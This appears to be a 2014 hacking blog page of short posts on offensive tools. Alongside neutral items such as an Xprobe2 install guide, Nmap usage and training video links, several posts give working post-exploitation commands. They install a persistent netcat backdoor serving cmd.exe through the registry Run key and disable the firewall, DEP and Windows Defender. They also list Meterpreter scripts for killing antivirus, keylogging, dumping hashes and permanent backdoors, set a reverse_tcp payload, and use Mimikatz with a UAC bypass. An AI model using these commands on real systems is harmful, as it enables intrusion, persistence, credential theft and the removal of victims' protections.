Saturday, 19 July 2014

Xprobe2 - active OS fingerprinting tool


Xprobe2 is use for perform fingerprinting on remote target.

Download Xprobe2

Installation(Bactrack and kali Linux has built in)

You will need libpcap:

$ sudo apt-get install libpcap0.8-dev

You will also need g++-4.1

$ sudo apt-get install g++-4.1

Install Xprobe2

$ wget http://downloads.sourceforge.net/project/xprobe/xprobe2/Xprobe2%200.3/xprobe2-0.3.tar.gz
$ tar xzvf xprobe2-0.3.tar.gz
$ cd xprobe2-0.3/
$ ./configure CC=gcc-4.1 CXX=g++-4.1
$ make
$ sudo make install

Options

-v
Be verbose

-r
Show route to target(traceroute-like output)

-p <proto:portnum:state>
Specify portnumber (1-65535), protocol (tcp|udp) and state (closed|open).
Example: tcp:25:open, UDP:55:CLOSED

-c <configfile>
Specify config file to use.

-h
Print this help.

-o <fname>
Use logfile to log everything.

-t <time_sec>
Set receive timeout to receive_timeout in seconds
(default: 10 seconds)

-s <send_delay>
Set packsending delay (milseconds).

-d <debuglv>
Specify debugging level.

-D <modnum>
Disable module number <modnum>.

-M <modnum>
Enable module number <modnum>.

-L
Display modules.

-m <numofmatches>
Specify number of matches to print.

-T <portspec>
Enable TCP portscan for specified port(s).
Example: -T21-23,25,53

-U <portspec>
Enable UDP portscan for specified port(s).

-f
Force fixed round-trip time (-t opt).

-F
Generate signature (use -o to save to a file).

-X
Generate XML output and save it to logfile specified with -o.

-B
Options forces TCP handshake module to try to guess open TCP port

-A
Perform analysis of sample packets gathered during portscan in order to detect suspicious traffic (i.e. transparent proxies, firewalls/NIDSs resetting connections).
Use with -T.

Posted by at No comments:
Labels: ,

Rootkits Training from Offensive Security


A rootkit is a type of malicious software that is activated each time your system boots up. Rootkits are difficult to detect because they are activated before your system's Operating System has completely booted up. A rootkit often allows the installation of hidden files, processes, hidden user accounts, and more in the systems OS. Rootkits are able to intercept data from terminals, network connections, and the keyboard.

Download : Rootkits Training from Offensive Security [Torrent Link][720p]

Files :

Day 1 Part 1_ Rootkits_ What they are, and how to find them[720p]

Day 1 Part 2_ Rootkits_ What they are, and how to find them[720p]

Day 1 Part 3_ Rootkits_ What they are, and how to find them[720p]

Day 1 Part 4_ Rootkits_ What they are, and how to find them[720p]

Day 2 Part 5_ Rootkits_ What they are, and how to find them[720p]

Day 1 Part 5_ Rootkits_ What they are, and how to find them[720p]

Day 1 Part 6_ Rootkits_ What they are, and how to find them[720p]

Day 2 Part 1_ Rootkits_ What they are, and how to find them[720p]

Day 2 Part 2_ Rootkits_ What they are, and how to find them[720p]

Day 2 Part 3_ Rootkits_ What they are, and how to find them[720p]

Day 2 Part 4_ Rootkits_ What they are, and how to find them[720p]



















Download : Rootkits Training from Offensive Security [Torrent Link]
Posted by at No comments:
Labels: , ,

Wednesday, 16 July 2014

Investigating Internet Crimes


BOOK DESCRIPTION

Written by experts on the frontlines, Investigating Internet Crimes provides seasoned and new investigators with the background and tools they need to investigate crime occurring in the online world. This invaluable guide provides step-by-step instructions for investigating Internet crimes, including locating, interpreting, understanding, collecting, and documenting online electronic evidence to benefit investigations.

Cybercrime is the fastest growing area of crime as more criminals seek to exploit the speed, convenience and anonymity that the Internet provides to commit a diverse range of criminal activities. Today’s online crime includes attacks against computer data and systems, identity theft, distribution of child pornography, penetration of online financial services, using social networks to commit crimes, and the deployment of viruses, botnets, and email scams such as phishing. Symantec’s 2012 Norton Cybercrime Report stated that the world spent an estimated $110 billion to combat cybercrime, an average of nearly $200 per victim.

Law enforcement agencies and corporate security officers around the world with the responsibility for enforcing, investigating and prosecuting cybercrime are overwhelmed, not only by the sheer number of crimes being committed but by a lack of adequate training material. This book provides that fundamental knowledge, including how to properly collect and document online evidence, trace IP addresses, and work undercover.


  • Provides step-by-step instructions on how to investigate crimes online
  • Covers how new software tools can assist in online investigations
  • Discusses how to track down, interpret, and understand online electronic evidence to benefit investigations
  • Details guidelines for collecting and documenting online evidence that can be presented in court
Posted by at No comments:
Labels:

ImmediateCrypt v 1.0 : Encryption and Decryption with AES 256


ImmediateCrypt is a free and open-source application that allows you to encrypt and decrypt plain text messages.

Download : ImmediateCrypt v 1.0
Posted by at No comments:
Labels: , ,

Tuesday, 15 July 2014

OWASP WebGoat Training Series


All Video tutorial by YGN Ethical Hacker Group




Download : OWASP WebGoat Training Series
Posted by at No comments:
Labels: ,

Offensive Security Lectures & Videos 2013



Download : Offensive Security Lectures Videos

Lecture 1: Intro, Ethics, & Overview:
This lecture covers the course Intro, syllabus review, distinction between hacking vs. penetration testing, ethics discussion, course motivation, threat models and some of the basics.

Lecture 2: Linux Overview:
This lecture covers the basics to an OS, Kernel vs user space, system calls, unix permissions, ruid vs euid etc..., ext file system (for the limited focus of forensics), persistence mechanisms used by malware, and /var/log, and more.

Lecture 3: Windows Overview
This lecture provides an overview of the registry and registry hives, persistence mechanisms used by malware, Portable Executable (PE) file format overview, window systems calls commonly used by malware, and the windows API.

Lecture 4: Rootkits; Code Auditing
The first half of this lecture covers rootkits and rootkit techniques for windows and linux. The second half covers code auditing concepts like design flaws, software analysis, vulnerability identification, signed bugs (int over/under flows), incorrect use of length params (strncpy, strncat, snprintf), format strings, …

Lecture 5: x86 Reverse engineering
This lecture is day one of our weeklong x86 reverse engineering workshop lead by guest lecturer Mitch Adair.

Lecture 6:
This lecture is day two of our weeklong x86 reverse engineering workshop lead by guest lecturer Mitch Adair.

Lecture 7: Fuzzing and Exploit Development 101
This lecture covers a fuzzing overview, the basics of exploit development, environment variables, stack attacks, buffer overflow, nop-sleds, etc...

Lecture 8: Shellcode and Exploit Development 102
Lectore topics: more on writing Shellcode (linux vs windows), win32 process memory map ...

Lecture 9: Exploit Development 103: SEH Exploitation, Heap Sprays, and Executable Security Mechanisms
This lecture covers SEH exploitation, heap sprays, and executable security mechanisms like ASLR, DEP/NX, Stack Cookies...

Lecture 10: Networking 101: Data Layer, Link Layer, and IP layer
This lecture covers an overview of networking concepts and network security concepts. Topics covered: Wireshark, Nmap, nc, Hubs vs switches vs routers, manufacturer default logins / backdoors... ARP & dns (dnssec), proxies, weak IP vs strong IP model (RFC 1122)

Lecture 11: Networking 102: TCP layer, Important Protocols, Services, Portscanning, ARP
This lecture finishes up the networking overview from last time.

Lecture 12: Web application Hacking 101
Its a bit shorter than other videos as the class time was taken up going over homework beforehand. This lecture addresses some of the big picture with the topics covered so far, and moves into web application security topics.

Lecture 13: Web Application Hacking 102: Big picture of topics so far, SQLi, XSS
This lecture's topices cover HTTP proxies, SQLi and XSS

Lecture 14: Web Application Hacking 103: SSL attacks, advanced techniques
This lecture's topics cover SSL/TLS, Certificate Authorities, and the serious problems with the Certificate Authority infrastructure, and a history of CA hacks / breaches, and SSL hacking tools like sslstrip ...

Lecture 15: Web Application Hacking 104 & Exploit Development 104
This class was two lectures in one. In the web application 104 lecture we cover topics like WAF, and IDS and how to evade them - which leads into the exploit development 104 lecture. In the exploit dev 104 section we cover topics like networking shellcode, polymorphic shellcode / encoders, and the methodology for defeating IDS/WAF

Lecture 16: Midterm review & Exploit Development 105 (ROP)
This lecture's first half is a review of topics for the midterm. The second half introduces Return Oriented Programming.

Lecture 17: The Modern History of Cyber Warfare
This lecture covers just a small sample of the major events one might consider part of the history of cyber warfare. The lecture discusses some of the potential tactical and strategic differences between traditional warfare and cyber warfare - as well as the policy and perspective hurdles we face today. This lecture happened shortly after the ground-breaking APT1 report from Mandiant.

Lecture 18: Social Engineering
The first portion of this video is a continuation of the previous lecture on cyber warfare. Afterwards, this lecture offers a new spin on social engineering - by staring with fundamental psychological flaws in the human brain, and discussing how they can be exploited...

Lecture 19: Metasploit
This lecture covers the metasploit framework, its interfaces, basic usage, and some of its utilities, along with a brief discussion of the social-engineering toolkit (SET)...

Lecture 20: Meterpreter and Post Exploitation
This lecture starts by finishing the SET discussion from last time, covers Windows access-tokens, then delves into meterpreter and post exploitation...

Lecture 21: Volatility and Incident Response:
This lecture covers an overview of Incident Response and delves into Volatility and memory analysis..

Lecture 22: Physical Security Workshop: Lockpicking, USB mischief, and BacNET/SCADA system security
This lecture covers physical security, with a hands-on workshop on lockpicking, along with a simultaneous discussion of USB-related-mischief, building hacking (BacNET / SCADA) ....

Download : Offensive Security Lectures Videos
Posted by at No comments:
Labels: ,

Dumping Cleartext login Credentials with Mimikatz

Mimikatz is a tool that can dump clear text passwords from memory.


Click here to Download Mimikatz

In modern Windows systems where UAC is in place we will need to bypass it with the use of the metasploit post exploitation module bypassuac (post/windows/escalate/bypassuac) for execute Mimikatz.


Posted by at No comments:
Labels: , ,

Monday, 14 July 2014

Nmap Firewalk Script


it's usefull for discover firewall rules using an IP TTL expiration technique known as firewalking.

Example Usage

nmap --script=firewalk --traceroute <host>
nmap --script=firewalk --traceroute --script-args=firewalk.max-retries=1 <host>
nmap --script=firewalk --traceroute --script-args=firewalk.probe-timeout=400ms <host>
nmap --script=firewalk --traceroute --script-args=firewalk.max-probed-ports=7 <host>

Download : Nmap Firewalk Script


Posted by at No comments:
Labels: , , ,

Sunday, 13 July 2014

Best Meterpreter Script



getcountermeasure

Getcountermeasure is an automated script Disable security measures such as antivirus, firewall, and more.

Command : run getcountermeasure


winenum

Winenum script is used to dump tokens, hashes and more

Command : run winenum

getgui

getgui script is used to enable RDP on a target system.

Command : run getgui -e


killav

Killav used to disable most antivirus programs.

Command : run killav
gettelnet

gettelnet script is used to enable telnet on the victim.

Command : run gettelnet -e

hostedit

Hostedit Meterpreter script is used to edit host file of windows

Command : run hostedit

checkvm

Checkvm used to see if you exploited a virtual machine

Command : run checkvm

screenspy

screenspy used to take screenshot of remote pc.

Command : run screenspy

keylogrecorder

keylogrecorder used to start keylogger in victim pc.

Command : run keylogrecorder

metsvc

used to make permanent backdoor
Posted by at No comments:
Labels: ,

Saturday, 12 July 2014

keimpx – SMB Credential Scanner


keimpx is an open source tool, released under a modified version of Apache License 1.1. It can be used to quickly check for the usefulness of credentials across a network over SMB. Credentials can be:

  1. Combination of user / plain-text password.
  2. Combination of user / NTLM hash.
  3. Combination of user / NTLM logon session token.

    If any valid credentials has been discovered across the network after its attack phase, the user is asked to choose which host to connect to and which valid credentials to use, then he will be prompted with an interactive SMB shell where the user can:

    1. Spawn an interactive command prompt.
    2. Navigate through the remote SMB shares: list, upload, download files, create, remove files, etc.
    3. Deploy and undeploy his own service, for instance, a backdoor listening on a TCP port for incoming connections.
    4. List users details, domains and password policy.



      Posted by at No comments:
      Labels: ,

      Friday, 11 July 2014

      How to get MUICache Entries in Remote Windows Machine


      According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the ‘MuiCache’.”

      use post/windows/gather/enum_muicache

      msf exploit (enum_muicache)>set payload windows/meterpreter/reverse_tcp

      msf exploit (enum_muicache)>set lhost 192.168.1.3 (IP of Local Host)

      msf exploit (enum_muicache)>set session 2

      msf exploit (enum_muicache)>exploit


      Posted by at No comments:
      Labels: , , ,

      How to Disable Windows Firewall using Metasploit



      Windows Firewall can help protect your PC from hackers and malicious software. In Windows 7, it is still powerful—but we have made it more flexible and easier to use.

      For example, now you can fine-tune the protection and notifications you want for each of your network profiles—Home, Work, and Public. When you are connected to a public network like a library or a coffee shop, you may want to block all incoming connections. At home or work, this might be overkill. Whatever level of protection you choose for your profiles, you will be able to switch between them with ease.

      Command : 

      netsh firewall set opmode disable 

      Posted by at No comments:
      Labels: , ,

      Thursday, 10 July 2014

      How to Install Netcat Backdoor on a Remote Machine Using Metasploit


      When an attacker successfully compromise a system they need to maintain the connection, that's why the attacker usually installing backdoor on victim computer for future use to make attacker easily connect to victim computer to use victim resource, and collecting data on victim computer.

      1 - we must upload netcat to the remote system.
      Command :
      meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

      2 - now we edit in registry to have netcat execute on start up and listen on port 443
      Command :
      meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

      3 - add our NetCat into start up process
      Command :
      meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

      4 - To check our backdoor in autorun process or not
      Command :
      meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

      VIDEO :


      Posted by at No comments:
      Labels: ,

      Wednesday, 9 July 2014

      How to stop Date Execution Prevention Service(DEP) using Metasploit in Windows


      Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful programs can try to attack Windows by attempting to run (also known as execute) code from system memory locations reserved for Windows and other authorized programs. These types of attacks can harm your programs and files.

      DEP can help protect your computer by monitoring your programs to make sure that they use system memory safely. If DEP notices a program on your computer using memory incorrectly, it closes the program and notifies you.

      Command : bcdedit.exe /set {current} nx AlwaysOff

      Posted by at No comments:
      Labels: , , ,

      Tuesday, 8 July 2014

      How to Stop Windows Defender Service in remote pc using Metasploit


      When Windows Defender is on, you're notified when spyware or other potentially unwanted software tries to install itself or run on your computer. If you use the default settings, Windows Defender also checks for new definitions (files that are used to determine if software is spyware) and automatically removes any detected item that has a recommended removal action.

      Command : net stop WinDefend


      Posted by at No comments:
      Labels: , ,
      Subscribe to: Comments (Atom)